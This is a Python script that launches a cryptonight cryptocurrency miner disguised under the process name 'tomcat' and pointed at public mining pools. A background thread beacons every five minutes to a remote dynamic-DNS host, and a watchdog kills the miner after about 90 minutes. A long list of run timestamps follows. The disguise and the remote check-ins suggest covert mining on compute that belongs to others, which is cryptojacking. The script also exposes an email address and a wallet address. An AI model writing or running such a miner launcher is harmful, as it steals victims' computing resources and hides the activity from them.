import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:07.255876
#2018-02-17 17:38:06.298210
#2018-02-17 19:25:03.793061
#2018-02-17 21:14:05.889817
#2018-02-17 22:58:04.620867
#2018-02-18 00:44:05.680541
#2018-02-18 02:33:06.407324
#2018-02-18 04:21:06.236749
#2018-02-18 06:13:05.165058
#2018-02-18 08:03:04.378703
#2018-02-18 09:51:06.097889
#2018-02-18 11:38:04.271263
#2018-02-18 13:23:04.424324
#2018-02-18 15:13:07.167500
#2018-02-18 17:02:03.347425
#2018-02-18 18:49:05.291482
#2018-02-18 20:36:04.340005
#2018-02-18 22:22:05.510353
#2018-02-19 00:11:07.677389
#2018-02-19 01:57:04.696065
#2018-02-19 03:43:06.387696
#2018-02-19 05:28:07.651183
#2018-02-19 07:16:04.004459
#2018-02-19 09:04:06.044471
#2018-02-19 10:51:08.665501
#2018-02-19 12:41:08.682210
#2018-02-19 14:28:02.108954
#2018-02-19 16:18:10.106301
#2018-02-19 18:05:05.395621
#2018-02-19 19:52:07.045926
#2018-02-19 21:39:06.854647
#2018-02-19 23:25:08.685163
#2018-02-20 01:12:05.334823
#2018-02-20 03:02:02.099833
#2018-02-20 04:48:06.542335
#2018-02-20 06:32:07.503801
#2018-02-20 08:16:07.855189
#2018-02-20 10:02:05.918094
#2018-02-20 11:46:08.476880
#2018-02-20 13:33:08.111370
#2018-02-20 15:18:06.217184
#2018-02-20 17:03:08.221168
#2018-02-20 18:51:05.866988
#2018-02-20 20:42:05.986708
#2018-02-20 22:27:06.134107
#2018-02-21 00:07:06.717688
#2018-02-21 01:52:05.202983
#2018-02-21 03:39:06.485078
#2018-02-21 05:28:03.936856
#2018-02-21 07:16:01.448481
#2018-02-21 09:00:08.462085
#2018-02-21 10:48:08.353585
#2018-02-21 12:34:11.083519
#2018-02-21 14:21:08.546355
#2018-02-21 16:10:09.428858
#2018-02-21 18:01:11.108531
#2018-02-21 19:48:09.039082
#2018-02-21 21:36:02.037025
#2018-02-21 23:22:07.747117
#2018-02-22 01:11:07.142719
#2018-02-22 03:01:01.298517
#2018-02-22 04:46:04.634539
#2018-02-22 06:30:08.738975
#2018-02-22 08:18:01.777941
#2018-02-22 10:06:09.381568
#2018-02-22 11:51:04.100568
#2018-02-22 13:36:05.801198
#2018-02-22 15:24:01.655106
#2018-02-22 17:09:07.072180
#2018-02-22 18:55:05.405863
#2018-02-22 20:46:05.000216
#2018-02-22 22:31:01.348392
#2018-02-23 00:18:08.376992
#2018-02-23 02:07:03.204532
#2018-02-23 03:56:01.570159
#2018-02-23 05:43:04.309185
#2018-02-23 07:28:01.282115
#2018-02-23 09:31:07.686244
#2018-02-23 11:37:04.560906
#2018-02-23 13:25:09.676753
#2018-02-23 15:12:08.519570
#2018-02-23 17:02:04.199760
#2018-02-23 18:51:05.576931
#2018-02-23 20:39:02.044799
#2018-02-23 22:25:03.586840
#2018-02-24 00:10:03.753519
#2018-02-24 02:03:01.752365
#2018-02-24 03:53:01.404047
#2018-02-24 05:39:06.355382
#2018-02-24 07:31:06.228746
#2018-02-24 09:17:04.872966
#2018-02-24 11:10:07.651440
#2018-02-24 12:58:05.886903
#2018-02-24 14:46:07.571340
#2018-02-24 16:38:06.366664
#2018-02-24 18:27:04.052849
#2018-02-24 20:13:07.379707
#2018-02-24 22:01:05.215231
#2018-02-25 01:00:01.574092
#2018-02-25 04:40:06.297239
#2018-02-25 08:30:04.121499